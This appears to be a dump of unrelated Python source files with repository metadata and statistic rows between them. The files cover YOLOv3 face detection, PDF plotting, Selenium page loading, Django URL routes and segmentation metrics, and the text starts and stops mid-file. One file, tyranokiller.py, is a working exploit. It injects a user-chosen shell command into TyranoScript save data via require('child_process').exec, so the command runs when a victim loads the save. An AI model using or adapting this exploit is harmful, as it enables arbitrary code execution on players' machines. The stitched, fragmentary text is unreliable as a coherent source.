schema = 'churnsim2'
if len(sys.argv) >= 2:
schema = sys.argv[1]
dataset = None
if len(sys.argv) >= 3:
dataset = sys.argv[2]
churn_calc = ChurnCalculator(schema,dataset)
churn_calc.dataset_stats(save=True)
churn_calc.dataset_corr(save=True)
churn_calc.dataset_corr(save=True,use_scores=False)
if __name__ == "__main__":
main()
| 23.9
| 86
| 0.687587
| 97
| 717
| 4.907216
| 0.484536
| 0.094538
| 0.10084
| 0.05042
| 0.134454
| 0.134454
| 0.134454
| 0.134454
| 0
| 0
| 0
| 0.008993
| 0.224547
| 717
| 29
| 87
| 24.724138
| 0.847122
| 0.327755
| 0
| 0
| 0
| 0
| 0.037445
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af8b4f7cdd96f1e05ccc0b6456d5fe449a767019
| 2,888
|
py
|
Python
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 25
|
2020-11-20T09:01:35.000Z
|
2022-03-29T10:35:38.000Z
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 5
|
2021-02-28T20:49:37.000Z
|
2022-03-04T21:50:27.000Z
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 16
|
2020-12-06T07:26:13.000Z
|
2022-03-01T07:51:55.000Z
|
"""Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
import yolov3.yolov3_postprocessing as postprocessing
import numpy as np
import cv2
import os
class YOLOV3(object):
"""YOLOv3"""
def __init__(self, camera_height, camera_width, yolo_model):
# load YOLO model
self.yolo_v3 = yolo_model
# parameters for preprocessing
self.ih, self.iw = (camera_height, camera_width)
self.h, self.w = (416, 416)
self.scale = min(self.w / self.iw, self.h / self.ih)
self.nw = int(self.iw * self.scale)
self.nh = int(self.ih * self.scale)
# parameters for postprocessing
self.image_shape = [camera_height, camera_width]
self.model_shape = [self.h, self.w]
self.num_classes = 1
self.anchors = self.get_anchors()
def get_anchors(self):
"""return anchors
Returns:
[ndarray]: anchors array
"""
SRC_PATH = os.path.realpath(__file__).rsplit("/", 1)[0]
anchors_path = os.path.join(SRC_PATH, './yolo_anchors.txt')
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def inference(self, img):
"""Run YOLOv3 for face detection
Args:
img ([ndarray]): image (416, 416, 3)
"""
# preprocessing: resize and paste input image to a new image with size 416*416
img = np.array(img, dtype='float32')
img_resize = cv2.resize(img, (self.nw, self.nh),
interpolation=cv2.INTER_CUBIC)
img_new = np.ones((416, 416, 3), np.float32) * 128
img_new[(self.h - self.nh) // 2: ((self.h - self.nh) // 2 + self.nh),
(self.w - self.nw) // 2: (self.w - self.nw) // 2 + self.nw, :] = img_resize[:, :, :]
img_new = img_new / 255.
# inference
resultList = self.yolo_v3.execute([img_new])
out_list = [resultList[0], resultList[1], resultList[2]]
# convert yolo output to box axis and score
box_axis, box_score = postprocessing.yolo_eval(
out_list, self.anchors, self.num_classes, self.image_shape)
# get the crop image and corresponding width/heigh info for WHENet
nparryList, boxList = postprocessing.get_box_img(img, box_axis)
return nparryList, boxList
| 39.027027
| 100
| 0.630194
| 398
| 2,888
| 4.454774
| 0.379397
| 0.033841
| 0.025381
| 0.038917
| 0.062042
| 0.031585
| 0
| 0
| 0
| 0
| 0
| 0.028972
| 0.259003
| 2,888
| 73
| 101
| 39.561644
| 0.799533
| 0.322715
| 0
| 0
| 0
| 0
| 0.014369
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.108108
| 0
| 0.27027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af8d86b547c3138c87e5922ed826526a715c832e
| 3,466
|
py
|
Python
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
from six.moves import range
from scitbx.array_family import flex
page_origin = (20.,220.)
boxedge = 500.
class PointTransform:
'''provide the necessary transformation to go from image pixel coordinates
to coordinates on the printed page of the .pdf report'''
def __init__(self,detector_edge):
self.boxedge = boxedge
self.page_origin = page_origin
self.size1 = detector_edge
self.size2 = detector_edge
self.subwindow_origin=[0.,0.]
self.subwindow_fraction=1.
def toPage(self, image_pixel_xy):
image_fractional_coords = ((1.-image_pixel_xy[0]/self.size1),
image_pixel_xy[1]/self.size2)
image_subwindow_coords = ((image_fractional_coords[1]-self.subwindow_origin[1])/
self.subwindow_fraction,
(image_fractional_coords[0]-self.subwindow_origin[0])/
self.subwindow_fraction)
if 0.<image_subwindow_coords[0]<1. and 0.<image_subwindow_coords[1]<1.:
page_coords = (image_subwindow_coords[0]*self.boxedge + self.page_origin[0],
(1.-image_subwindow_coords[1])*self.boxedge + self.page_origin[1]
)
return page_coords
return None
from reportlab.pdfgen.canvas import Canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.units import cm,mm
class Graph:
def __init__(self,fileout):
self.c = Canvas(fileout,pagesize=letter)
def title(self,text):
print(text)
lines = text.split('\n')
self.c.setFont('Helvetica',12)
self.c.drawString(2*cm,26*cm,lines[0])
if len(lines)>1:
self.c.drawString(2*cm,25.5*cm,lines[1])
def setTransform(self,detector_edge):
#given the raw image fractional coordinates of the subwindow origin
self.T = PointTransform(detector_edge)
def __del__(self):
self.c.save()
class PDF:
def __init__(self,filename):
self.R = Graph(filename)
def make_image_plots_detail(self,ray_sim):
normal = ray_sim.sim.tracing_impacts
self.R.setTransform(ray_sim.detector.raw.focus()[0])
self.R.title(
"%.3f bandpass + %.3f degrees mosaicity (full widths); perfect optics"%(
ray_sim.sim.bandpass,
ray_sim.sim.mosaicity)+
"\nEnergy %4.1f KeV; Detector distance %6.1f mm; Limiting resolution %6.2f Angstrom"%(
(12.398/(ray_sim.camera.lambda0*1E10)),
ray_sim.camera.distance*1000.,
ray_sim.structure.limiting_resolution))
data_array = 255-ray_sim.image
import numpy
try:
import PIL.Image as Image
except ImportError:
import Image
imageout = Image.frombuffer("L",data_array.focus(),
data_array.as_numpy_array().astype(numpy.uint8).tostring(),
"raw","L",0,1
)
self.R.c.drawInlineImage(imageout,x=2*cm,y=9*cm, width=15*cm, height=15*cm)
self.R.c.showPage()
return self
if __name__=="__main__":
data_array = flex.double(flex.grid((768,768)),1.0)
print(data_array.focus())
data_array = flex.double(flex.grid((7,7)),255)
for x in range(7):
data_array[(3,x)] = 0.
data_array[(x,3)] = 0.
try:
import PIL.Image as Image
except ImportError:
import Image
import numpy
args = ("L",0,1)
imageout = Image.frombuffer("L",data_array.focus(),
data_array.as_float().as_numpy_array().astype(numpy.uint8).tostring(),
"raw","L",0,1)
imageout.save("newfile.png","PNG")
| 31.798165
| 89
| 0.671091
| 490
| 3,466
| 4.542857
| 0.322449
| 0.040431
| 0.044924
| 0.028302
| 0.196766
| 0.151842
| 0.127583
| 0.127583
| 0.127583
| 0.127583
| 0
| 0.036863
| 0.201673
| 3,466
| 108
| 90
| 32.092593
| 0.767618
| 0.055395
| 0
| 0.137931
| 0
| 0.011494
| 0.060374
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091954
| false
| 0.022989
| 0.16092
| 0
| 0.321839
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af950ed2adf47bfd5bbac8fc2d72461c9405f310
| 1,809
|
py
|
Python
|
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | null | null | null |
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | 20
|
2019-11-14T16:35:42.000Z
|
2021-05-17T14:55:44.000Z
|
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | null | null | null |
"""
This module contains the definition of the DefaultSampler.
"""
import logging
from typing import Iterable
from lemonspotter.core.parameter import Direction
from lemonspotter.core.sampler import Sampler
from lemonspotter.core.variable import Variable
from lemonspotter.core.function import Function
from lemonspotter.core.sample import FunctionSample
class DeclarationSampler(Sampler):
"""
This class implements the DefaultSampler behaviour. It uses the default values from the
specification types to create a single Variable.
"""
def __str__(self) -> str:
return type(self).__name__
def generate_samples(self, function: Function) -> Iterable[FunctionSample]:
"""
"""
logging.debug('DeclarationSampler used for %s', function.name)
def evaluator() -> bool:
raise NotImplementedError('DeclarationSampler only generates compilable ' +
'code, not runnable.')
# generate valid but empty arguments
arguments = []
variables = set()
for parameter in function.parameters: # type: ignore
if parameter.direction == Direction.OUT and parameter.type.dereferencable:
mem_alloc = f'malloc(sizeof({parameter.type.dereference().language_type}))'
variable = Variable(parameter.type, f'arg_{parameter.name}', mem_alloc)
variables.add(variable)
else:
variable = Variable(parameter.type, f'arg_{parameter.name}')
variables.add(variable)
logging.debug('declaring variable argument: %s', variable.name)
arguments.append(variable)
sample = FunctionSample(function, True, variables, arguments, evaluator)
return set([sample])
| 33.5
| 91
| 0.66335
| 183
| 1,809
| 6.480874
| 0.459016
| 0.067454
| 0.084317
| 0.048904
| 0.077572
| 0.077572
| 0.077572
| 0.077572
| 0
| 0
| 0
| 0
| 0.250415
| 1,809
| 53
| 92
| 34.132075
| 0.874631
| 0.139856
| 0
| 0.068966
| 0
| 0
| 0.147832
| 0.039422
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.241379
| 0.034483
| 0.448276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af9558754aad314aeb8db737a2091bb0a63f662a
| 480
|
py
|
Python
|
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
'''
main.py
Created by JO HYUK JUN on 2021
Copyright © 2021 JO HYUK JUN. All rights reserved.
'''
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
output = 0
str_set = []
for idx, val in enumerate(s):
if val in str_set:
str_set = str_set[str_set.index(val) + 1:]
str_set.append(val)
output = max(output, len(str_set))
return output
| 21.818182
| 58
| 0.525
| 62
| 480
| 3.967742
| 0.596774
| 0.170732
| 0.109756
| 0.146341
| 0.097561
| 0.097561
| 0
| 0
| 0
| 0
| 0
| 0.033784
| 0.383333
| 480
| 22
| 59
| 21.818182
| 0.793919
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af95fa980c5195e3c75aff212645fcf4a36ea392
| 2,532
|
py
|
Python
|
tyranokiller.py
|
satoki/tyranokiller
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | 5
|
2021-12-23T11:23:40.000Z
|
2022-01-01T22:48:18.000Z
|
tyranokiller.py
|
satoki/tyranoscript_vulnerability
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | null | null | null |
tyranokiller.py
|
satoki/tyranoscript_vulnerability
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | null | null | null |
# Exploit Title: TyranoScript 5.13b - Arbitrary Code Execution
# Date: 27/03/2022
# Exploit Author: Satoki
# Vendor Homepage: https://tyrano.jp/
# Software Link: https://github.com/ShikemokuMK/tyranoscript
#
# Version (Save Data ACE):
# TyranoScriptV5 <= 5.04b
# TyranoScript <= 4.83
#
# Version (Development Data ACE):
# TyranoBuilder <= 1.87b
# TyranoBuilderV5 <= 2.03
# TyranoRider <= 2.20
# TyranoStudio <= 1.10d
# (TyranoScriptV5 <= 5.13b)
# (TyranoScript <= 4.88)
#
# Tested on: Windows
# CVE : 0day
#
# GitHub: https://github.com/satoki/tyranoscript_vulnerability
# Usage: python3 tyranokiller.py -c "calc" Test.sav
import os
import sys
import shutil
from argparse import ArgumentParser
argparser = ArgumentParser()
argparser.add_argument("filename", type=str, help="Specify the target sav file name")
argparser.add_argument("-c", "--command", type=str, default="calc", help="Specify the command to be injected")
args = argparser.parse_args()
filename = args.filename
command = args.command
print(f"\033[91m\
-------------------------------------------------------------\n\
| _____ _ _ _ |\n\
| /__ \_ _ _ __ __ _ _ __ ___ /\ /(_) | | ___ _ __ |\n\
| / /\/ | | | '__/ _` | '_ \ / _ \ / //_/ | | |/ _ \ '__| |\n\
| / / | |_| | | | (_| | | | | (_) / __ \| | | | __/ | |\n\
| \/ \__, |_| \__,_|_| |_|\___/\/ \/|_|_|_|\___|_| |\n\
| |___/ |\n\
| v1.1.0|\n\
-------------------------------------------------------------\n\
CVE-XXXX-XXXX\033[0m\n\
Target: {filename}\n\
Command: {command}\n\
------------------------------------------------------------")
if not os.path.isfile(filename):
print("Error: sav file doesn't exist.")
sys.exit(1)
if "\"" in command:
print("Error: Double quotes can't be used in the command.")
sys.exit(1)
shutil.copyfile(filename, f"{filename}.bk")
savfile = open(f"{filename}.bk", mode="r")
data = savfile.read()
savfile.close()
command = command.replace("\\", "\\\\")
code = f"\
alert('Injected_by_TyranoKiller_!!!!');\
require('child_process').exec(`{command}`);\
"
data = data.replace("%3C/div%3E", f"%3C/div%3E%3Cscript%3E{code}%3C/script%3E", 1)
code = code.replace(";", ";\n")
print(f"Code:\n\033[96m{code}\033[0m\
------------------------------------------------------------")
savfile = open(filename, mode="w")
savfile.write(data)
savfile.close()
print("Completed.")
| 30.506024
| 110
| 0.527646
| 265
| 2,532
| 4.754717
| 0.490566
| 0.011111
| 0.011905
| 0.012698
| 0.005556
| 0.005556
| 0
| 0
| 0
| 0
| 0
| 0.035608
| 0.201422
| 2,532
| 82
| 111
| 30.878049
| 0.587537
| 0.236967
| 0
| 0.170213
| 0
| 0.085106
| 0.167715
| 0.036688
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.085106
| 0
| 0.085106
| 0.106383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af9c8aaccf0095264c9bcfb36a5958fdb4382d26
| 1,322
|
py
|
Python
|
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
__author__='Pruthvi Kumar'
# 30 June 2019.
# pruthvikumar.123@gmail.com
# Load web-page associated with given URL and await given dom element until specified time.
class LoadPage:
def __init__(self, url, dom_id, wait_time=5):
super(LoadPage, self).__init__()
self.url = url
self.dom_id = dom_id
self.wait_time = wait_time
self.driver = webdriver.Chrome()
def extractor(self):
try:
self.driver.get(self.url)
# Wait as long as required, or maximum of 5 sec for element to appear
# If successful, retrieves the element
WebDriverWait(self.driver, self.wait_time).until(EC.presence_of_element_located((By.ID, self.dom_id)))
# If you wanted to do any activity like login etc., conduct that here.
return self.driver.page_source
except TimeoutError:
print("Failed to load page / Failed to wait until {} element was loaded @ "
"{}.".format(self.dom_id, self.url))
finally:
self.driver.quit()
| 33.897436
| 114
| 0.67171
| 178
| 1,322
| 4.842697
| 0.5
| 0.069606
| 0.097448
| 0.064965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011044
| 0.246596
| 1,322
| 38
| 115
| 34.789474
| 0.854418
| 0.229955
| 0
| 0
| 0
| 0
| 0.082097
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.217391
| 0
| 0.391304
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af9cf05604e40321edbad3928cd57491f9b1fcff
| 1,598
|
py
|
Python
|
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('bd', views.bdaffair, name="bd_api"),
path('home', views.home_data, name='home_api'),
path('cultural', views.cultural_insights, name='cultural_api'),
path('sports', views.sports_insights, name='sports_api'),
path('international', views.internatioal, name='achievements_api'),
path('interview', views.interviews, name='interview_api'),
path('cc', views.cc, name='cc_api'),
path('youth', views.youth, name='youth_api'),
path('district', views.district_insights, name='district_api'),
path('comics', views.comics, name='comics_api'),
path('trending', views.trending, name='trending_api'),
path('diversed', views.diversed, name='diversed_api'),
path('bd/top', views.bdaffair_top, name="top_bd_api"),
path('home/top', views.home_data_top, name='top_home_api'),
path('cultural/top', views.cultural_insights_top, name='top_cultural_api'),
path('sports/top', views.sports_insights_top, name='top_sports_api'),
path('international/top', views.internatioal_top, name='top_achievements_api'),
path('interview/top', views.interviews_top, name='top_interview_api'),
path('cc/top', views.cc_top, name='top_cc_api'),
path('youth/top', views.youth_top, name='top_youth_api'),
path('district/top', views.district_insights_top, name='top_district_api'),
path('comics/top', views.comics_top, name='top_comics_api'),
path('trending/top', views.trending_top, name='top_trending_api'),
path('diversed/top', views.diversed_top, name='top_diversed_api')
]
| 55.103448
| 83
| 0.71214
| 221
| 1,598
| 4.895928
| 0.126697
| 0.148799
| 0.110906
| 0.049908
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112641
| 1,598
| 29
| 84
| 55.103448
| 0.763047
| 0
| 0
| 0
| 0
| 0
| 0.316448
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af9ec8c3e054bbb041579522842ad9b2da17d23a
| 11,544
|
py
|
Python
|
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | null | null | null |
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | 7
|
2021-11-12T05:58:48.000Z
|
2022-02-25T07:05:26.000Z
|
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from pathlib import Path
import itertools
from tqdm import tqdm
from ..utils import get_imageset
import matplotlib.pyplot as plt
import cv2
import json
from ..metrics.surface_dice import metrics as surface_distance
from ..metrics.functional import calc_isolated_fp
def calc_segmentation_metrics(confusion):
tp = np.diag(confusion)
fp = np.sum(confusion, 0) - tp
fn = np.sum(confusion, 1) - tp
tn = np.sum(confusion) - (fp + fn + tp)
iou = calc_iou_from_confusion(tp, fp, fn)
dice = calc_dice_from_confusion(tp, fp, fn)
precision = calc_precision_from_confusion(tp, fp)
recall = calc_recall_from_confusion(tp, fn)
sepecificity = calc_sepecificity_from_confusion(tn, fp)
return {
'iou': iou,
'dice': dice,
'precision': precision,
'recall': recall,
'specificity': sepecificity
}
def iou_dice_val(
nb_classes,
dataset,
model,
batch_size
):
confusion = np.zeros((nb_classes, nb_classes), dtype=np.int32)
print('\nvalidation...')
for i, (image, mask) in enumerate(tqdm(dataset)):
if i == 0:
images = np.zeros((batch_size,) + image.shape, dtype=image.dtype)
masks = np.zeros((batch_size,) + mask.shape, dtype=mask.dtype)
image_index = i % batch_size
images[image_index] = image
masks[image_index] = mask
if i == len(dataset) - 1 or image_index == batch_size - 1:
output = model.predict(images)
for j in range(image_index + 1):
confusion += calc_segmentation_confusion(
output[j], masks[j], nb_classes)
images[:] = 0
masks[:] = 0
return calc_segmentation_metrics(confusion)
def calc_segmentation_confusion(y_pred, y_true, nb_classes):
# Convert predictions and target from categorical to integer format
# y_pred: onehot, y_true: onehot
y_pred = np.argmax(y_pred, axis=-1).ravel()
y_true = np.argmax(y_true, axis=-1).ravel()
x = y_pred + nb_classes * y_true
bincount_2d = np.bincount(
x.astype(np.int32), minlength=nb_classes**2)
assert bincount_2d.size == nb_classes**2
confusion = bincount_2d.reshape((nb_classes, nb_classes))
return confusion
def calc_iou_from_confusion(tp, fp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
iou = tp / (tp + fp + fn)
iou[np.isnan(iou)] = 0
return [float(i) for i in iou]
def calc_dice_from_confusion(tp, fp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
dice = 2 * tp / (2 * tp + fp + fn)
dice[np.isnan(dice)] = 0
return [float(d) for d in dice]
def calc_precision_from_confusion(tp, fp):
with np.errstate(divide='ignore', invalid='ignore'):
precision = tp / (tp + fp)
precision[np.isnan(precision)] = 0
return [float(p) for p in precision]
def calc_recall_from_confusion(tp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
recall = tp / (tp + fn)
recall[np.isnan(recall)] = 0
return [float(r) for r in recall]
def calc_sepecificity_from_confusion(tn, fp):
with np.errstate(divide='ignore', invalid='ignore'):
sepecificity = tn / (fp + tn)
sepecificity[np.isnan(sepecificity)] = 0
return [float(s) for s in sepecificity]
def detection_rate_confusions(pred_labels, gt_labels, nb_classes):
"""
gt_labels: iterable container (Width, Height)
prediction_labels: iterable container (Width, Height)
nb_classes: number of classes
"""
confusion_tabel = np.zeros((nb_classes, 4), dtype=np.uint8)
for gt_label, pred_label in zip(gt_labels, pred_labels):
for class_id in range(nb_classes):
gt_mask = gt_label == class_id
pred_mask = pred_label == class_id
if np.sum(gt_mask) == 0 and np.sum(pred_mask) == 0:
confusion_tabel[class_id, 0] += 1
elif np.sum(gt_mask) == 0 and np.sum(pred_mask) > 0:
confusion_tabel[class_id, 1] += 1
elif np.sum(gt_mask * pred_mask) == 0:
confusion_tabel[class_id, 2] += 1
else:
confusion_tabel[class_id, 3] += 1
return confusion_tabel
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues,
save_file=None):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
plt.figure()
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
plt.savefig('{}.png'.format(save_file))
def calc_surface_dice(pred_out, gt_label, nb_classes, vertical=1.0, horizontal=1.0, tolerance=0.0):
"""
surface dice calculation
Args:
pred_out (np.array, shape (h,w,nb_classes)): prediction output.
gt_mask (np.array, shape (h,w)): ground truth mask.
nb_classes (int): the number of classes
vertical (float, optional): real length (mm) of pixel in the vertical direction. Defaults to 1.0.
horizontal (float, optional): real length (mm) of pixel in the horizontal direction. Defaults to 1.0.
tolerance (float, optional): acceptable tolerance (mm) of boundary. Defaults to 0.0.
Returns:
surface_dice (float):
"""
class_surface_dice = list()
# convert array (value: class_id)
pred_label = np.uint8(np.argmax(pred_out, axis=2))
gt_label = np.uint8(np.argmax(gt_label, axis=2))
for class_id in range(nb_classes):
gt_mask = gt_label == class_id
pred_mask = pred_label == class_id
# convert bool np.array mask
gt_mask = np.asarray(gt_mask, dtype=np.bool)
pred_mask = np.asarray(pred_mask, dtype=np.bool)
surface_distances = surface_distance.compute_surface_distances(
gt_mask,
pred_mask,
spacing_mm=(vertical, horizontal))
surface_dice = surface_distance.compute_surface_dice_at_tolerance(surface_distances, tolerance_mm=tolerance)
class_surface_dice.append(surface_dice)
return class_surface_dice
def calc_weighted_dice(confusion, isolated_fp, nb_classes, isolated_fp_weights=15.0):
"""
weighted dice calculation
Args:
confusion (np.array): confusion matrix.
isolated_fp (np.array): isolated fp for each class.
isolated_fp_weight (dict or float): isolated fp weights for each class. Defaults to 15.0.
Returns:
weighted_dice (np.array)
"""
if isinstance(isolated_fp_weights, float):
isolated_fp_weights = {i: isolated_fp_weights for i in range(nb_classes)}
assert isinstance(isolated_fp_weights, dict)
sorted_weights = sorted(isolated_fp_weights.items(), key=lambda x: x[0])
isolated_fp_weights = np.asarray([v for _, v in sorted_weights])
tp = np.diag(confusion)
connected_fp = np.sum(confusion, 0) - tp - isolated_fp
fn = np.sum(confusion, 1) - tp
class_w_dice = 2 * tp / (2 * tp + fn + connected_fp + isolated_fp_weights * isolated_fp)
return class_w_dice
def generate_segmentation_result(
nb_classes,
dataset,
model,
save_dir,
batch_size,
sdice_tolerance,
isolated_fp_weights
):
confusion_all = np.zeros((nb_classes, nb_classes), dtype=np.int32)
image_dice_list = list()
dice_list = list()
surface_dice_list = list()
isolated_fp_all = np.zeros(nb_classes, dtype=np.int32)
print('\nsave predicted image...')
for i, (image, mask) in enumerate(tqdm(dataset)):
if i == 0:
